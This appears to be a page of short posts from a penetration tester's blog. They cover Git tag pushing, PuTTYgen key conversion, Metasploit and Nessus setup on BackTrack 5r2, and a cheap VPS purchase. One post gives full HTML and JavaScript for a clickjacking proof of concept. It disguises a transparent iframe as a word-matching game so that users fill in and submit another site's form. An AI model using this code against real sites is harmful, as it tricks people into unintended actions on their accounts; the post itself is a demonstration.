NFTF: Pushing tags to Git Repositories – Converting puttygen keys to openssh versions

I’m working on a side project that has me contributing to a GIT repository for source control. Great! Only I haven’t got a freaking clue how to use it properly. First in the list: Pushing “Tags” up to the master repository First thing to note is t…

I’m working on a side project that has me contributing to a GIT repository for source control.

Great! Only I haven’t got a freaking clue how to use it properly.

First in the list:

Pushing “Tags” up to the master repository

First thing to note is that tags are typically only noted on your local copy of the repository. They aren’t pushed up to the origin when you make a Git Push, unless you specify otherwise.

This is fine and dandy if you’re using the command line git client from the off. Me, I was using TortoiseGIT on windows, bypassing the whole setting up of GIT Bash and there isn’t a simple checkbox that I’ve found in TortoiseGIT that says “push tags” along with a Git Push. So I needed to set it up.

The command that you have to run is:

git push origin --tags

This will push any tags that you have associated with your code (TortoiseGIT can create them by just rightclicking your repository and select “add tag”) up to the origin on your master repository (in my case hosted on assembla).

However before you get to that step you’ll need to have set up your GIT Bash first, and in my case as assembla uses PKI for authentication I would need to either:

a. Create a new key for the same computer, just for the GIT bash instance and add it (what i’ve typically done in the past, but loathed because it’s just duplication of effort)

b. Figure out why “export OpenSSH version” of my keys from puttygen has never actually just worked for me.

This time around I opted for b.

Converting PPK to id_rsa

I found this answer courtesy of stackoverflow and a user called Kaleb Pederson it is as follows:

  1. Open PuttyGen
  2. Click Load
  3. Load your private key
  4. Go to Conversions->Export OpenSSH and export your private key
  5. Copy your private key to ~/.ssh/id_rsa (or id_dsa).
  6. Create the RFC 4716 version of the public key using ssh-keygen
  7. ssh-keygen -e -f ~/.ssh/id_rsa > ~/.ssh/id_rsa_com.pub
  8. Convert the RFC 4716 version of the public key to the OpenSSH format:
  9. ssh-keygen -i -f ~/.ssh/id_rsa_com.pub > ~/.ssh/id_rsa.pub

With that done, your GIT bash should now be able to authenticate correctly to your Git repository using the PPK you already use for TortoiseGIT.

Leveraging HTML5 in order to turbo-charge clickjacking

You have a website and you’ve proven it’s vulnerable to clickjacking, but what use is fooling a user into submitting a form unless you can specify some of the data that the user is submitting within those fields? We’ve all played games online wher…

You have a website and you’ve proven it’s vulnerable to clickjacking, but what use is fooling a user into submitting a form unless you can specify some of the data that the user is submitting within those fields?

We’ve all played games online where you have to match up words to phrases or maybe things like the “impossible game” where you drag the words to the respective colours.

What about turning a harmless game such as the above into a form submission machine of awesome. Well now with HTML5 – you can!

It’s all thanks to the drag-and-drop method and in particular the ondragstart method.

draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')"

use that on anything you want to make draggable – in my testing I opted for a simple <div> containing a string, and ask the players to drag and drop the string onto the correct corresponding sentence.

When they click the “answer” button, it submits the jacked site.

So.. users drag the word CSS across to Cascading Style Sheets – enters “Rick Astley” into the search field of videos.yahoo.com

then users click the “answer” button – submits the video search

Now ideally if google didn’t have x- headers set that forbid the use of google in an iframe I’d have gone and “i’m feeling lucky”d it but sadly no autoplaying rick astley for me.

Still the premise is proven.

Html5_clickjack_1Html5_clickjack_2Html5_clickjack_3

Edit:

Now with added code! and a demonstration video.

Video Here:

I’m no web developer and quickly ran out of patience when working on the positioning issues so feel free to take, improve and build on it. I was merely creating this just to play with some of the features of HTML5.

Enjoy!

<html>  <head>    <title>HTML Clickjacking demonstration - drag and WTF!?</title>    <style>      iframe{position: absolute; top:0px; left:0; filter: alpha(opacity=0); opacity:0;z-index:1}      button{position: absolute; top:40px; left: 805px; z-index:-1; width:107px; height:26px;}      .magicfield1{position: absolute; top:40px; left: 340px; z-index:-1; height: 26px; border: 1px solid orange}      .magicfield2{position: absolute; top:40px; left: 480px; z-index:-1; height: 26px; border: 1px solid orange}      .magicfield3{position: absolute; top:40px; left: 650px; z-index:-1; height: 26px; border: 1px solid orange}      .magictext{position: absolute; top:54%; left: 50%; z-index:-1; }      .showhider{position: absolute; top:90%; left: 1%}      .intro{position: absolute; top:50%; left:0}    </style>    <script type="text/javascript">      function mask(){        document.getElementById("iframe").style.opacity = ".1"; // for most browsers          document.getElementById("iframe").style.filter = "alpha(opacity=10)"; // for IE      }      function hide(){        document.getElementById("iframe").style.opacity = ".0"; // for most browsers          document.getElementById("iframe").style.filter = "alpha(opacity=0)"; // for IE      }      function show(){        document.getElementById("iframe").style.opacity = ".9"; // for most browsers;          document.getElementById("iframe").style.filter = "alpha(opacity=90)"; // for IE        }      function reveal(){        alert("Checking your answer...");        document.getElementById("iframe").style.opacity = ".9"; // for most browsers        document.getElementById("iframe").style.filter = "alpha(opacity=90)"; //for IE      }    </script>  </head>  <body>    <div class="intro">      <p>Hello and welcome to the match game</p>      <p>All you have to do is drag the following 3 letter acronym to the matching string ---> </p>      <p class="showhider">As you know it's a test - Show iframe - Hide iframe - Mask iframe </p>    </div>    <div class="magictext" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')">      <H1 style="border: 1px dashed black">CSS</H1>    </div>        <span class=magicfield1>Cross Site Scripting</span><span class=magicfield2>Cuddly Slippery Snakes</span> <span class="magicfield3">Cascading Style Sheets</span>    <button>Answer</button>  </body></html>

Pastebin Link: http://pastebin.com/BeenqC19

msfupdate on Backtrack 5r2

Having annoying SVN issues trying to run msfupdate on your BT5R2 install? Something along the lines of “no version information found”. Try this: [code]cd /opt/metasploit/common/lib mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b mv libssl.so.0.9.8 libs…

Having annoying SVN issues trying to run msfupdate on your BT5R2 install?

Something along the lines of “no version information found”.

Try this:

cd /opt/metasploit/common/libmv libcrypto.so.0.9.8 libcrypto.so.0.9.8-bmv libssl.so.0.9.8 libssl.so.0.9.8-backupln -s /usr/lib/libcrypto.so.0.9.8ln -s /usr/lib/libssl.so.0.9.8

The above was obtained off of the backtrack forums but given the numbers of threads on that thing with similar topics, I’m guessing not a lot of people are seeing the actual solution.

As with everything I post, it worked for me but your mileage may vary.

Nessus 5.0 on Backtrack 5r2 Continued…

So you’ve followed the instructions in my previous post alright and gone to browse to http://localhost:8843, have already pre-empted the no-script nags by allowing all scripts from localhost (or whatever your paranoia level allows you to do) and s…

So you’ve followed the instructions in my previous post alright and gone to browse to http://localhost:8843, have already pre-empted the no-script nags by allowing all scripts from localhost (or whatever your paranoia level allows you to do) and still can’t get past that annoying “Nessus requires flash player 10.2 or later” message.

Don’t fear and don’t bother following any other horrible tutorial that involves shoving an old piece of flash software on your system. It’s time to go for the bleeding edge.

Within a terminal type:

wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gztar xvzf install_flash_player_11_linux.i386.tar.gzmkdir ~/.mozilla/pluginsmv libflashplayer.so ~/.mozilla/plugins/

Then just delete everything else that got extracted.

Yes it’s the 32bit flash – but it works.

Yes I know, it’s not the 64bit flash… but it still works on the x64 install of BT5R2 and does the job for accessing nessus.

Now you can browse to http://localhost:8834, create your user, ignore the bit about “enter your feed” details if it comes up (close the browser and re-open it) and voila… nessus 5.0 on bt5r2.

Nessus 5.0 on Backtrack 5r2

Note: I’ve not tried this on anything else so YMMV if you try this on 5r1 or less. Fire open a terminal window and as root type: [code]apt-get remove nessus[/code] This will remove the old v4.4.1 version from your backtrack instance and stop any n…

Note: I’ve not tried this on anything else so YMMV if you try this on 5r1 or less.

Fire open a terminal window and as root type:

apt-get remove nessus

This will remove the old v4.4.1 version from your backtrack instance and stop any nastyness occurring when you run the install with the two versions clashing.

Now head to http://www.nessus.org and grab yourself a copy of the latest version.

If you’re lucky enough to have a professional feed, great stuff.

If it’s your first time dealing with nessus, you’ll need to register for a homefeed so follow the steps online.

Download the package labeled as: Nessus-5.0.0-ubuntu910_amd64.deb (if you’ve a 64bit machine, else go for i386). I’ve not tested any other packages but I know the above one worked for me.

now back within the terminal window and in the location you saved the file to type:

dpkg -i Nessus-5.0.0-ubuntu910_amd64.deb

and watch as it magically installs everything you need. Upon completion nessus should be callable from the path.

Run:

nessus-fetch --version

To confirm the version number, it should come back at 5.0.0

Then using the code either for your professional feed or home feed register your nessus install:

nessus-fetch --register SERIAL_NUMBER_YOU_HAVE

Wait and it should confirm a successful registration and download the plugins.

Now just fire up nessus (first time after an update it takes an age as it unpacks and loads the plugins) and you’re away.

Not quite. What will come next is a guide as to how on earth you get Flash working in the onboard firefox on BT5R2.

Then, you should be all set for nessus scanning from your backtrack installation.

Going for the low end…

So I’ve been umming and ahhing for a while about buying a VPS to use for hosting files or playing with the IP over ICMP and DNS tunnelling system, even playing with a basic PBX setup to hook up with my sipgate account that I use for a landline. Bu…

So I’ve been umming and ahhing for a while about buying a VPS to use for hosting files or playing with the IP over ICMP and DNS tunnelling system, even playing with a basic PBX setup to hook up with my sipgate account that I use for a landline.

But 3 things have stopped me from doing it in the past.

1. Security – I’m paranoid, more so now i’m in my current job about just how easy it is to break into systems without too much hassle. Heck I do it for my day job, do I really want to take on board the full management of a server that has no security other than what I apply to it.

2. Security – I’m paranoid but I’d consider myself at least proficient at my job. What’s the likelihood I’ll tweak something, knacker the install and have to rebuild it over and over just because I was trying to lock it down just that bit more.

3. Cost – VPS instances aren’t cheap for something that may be left alone for months before being used on occassion.

So I never got around to it, I did mess about once but after pooching the firewall and having to pay £15 for a server rebuild as they had no other way of accessing it and support wouldn’t just take the firewall down for me I cancelled the account and never looked again.

Until now. I’ve been browsing the entries over at www.lowendbox.com and monitoring the offers up there, understandably a lot of the offers are flashes in a pan, you pay $5 for access to an amazing VM, a week later the company stops trading and starts up another scam.

However I came across a post about a company called “quickpacket” offering a very basic low end VM (128mb ram, 256mb vSwap, 20GB HDD, 500GB transit) for $15 for 12 months.

At just over $1 a month I figured I could suck that up if they disappeared overnight, but I read into them. They’ve been trading quite a while now, looks like a seller of webspace primarily but have moved into VPS hosting.

So yes, I am now the proud new owner of a mini-VPS. Stay tuned for developments but on the cards i’m thinking private svn repository, ICMP Tunnelling and maybe a play about with that PBX idea.

P.S. I’ve already locked myself out of it at least 10 times, thank goodness they have other means to access it and a great big “rebuild” button for when you absolutely hosed the box, no additional costs 🙂

NFTF: Extracting the important bits from wsusscn2.cab

Working on a script for extracting MS numbers for patches for work. The following command allows 7zip to extract the needed files without extracting the hundreds of thousands of other items in a giant lump. [code]c:Program Files7-Zip7z.exe” x -…

Working on a script for extracting MS numbers for patches for work.

The following command allows 7zip to extract the needed files without extracting the hundreds of thousands of other items in a giant lump.

c:Program Files7-Zip7z.exe" x -ir!x/* cabs/package*.cab

Bloody useful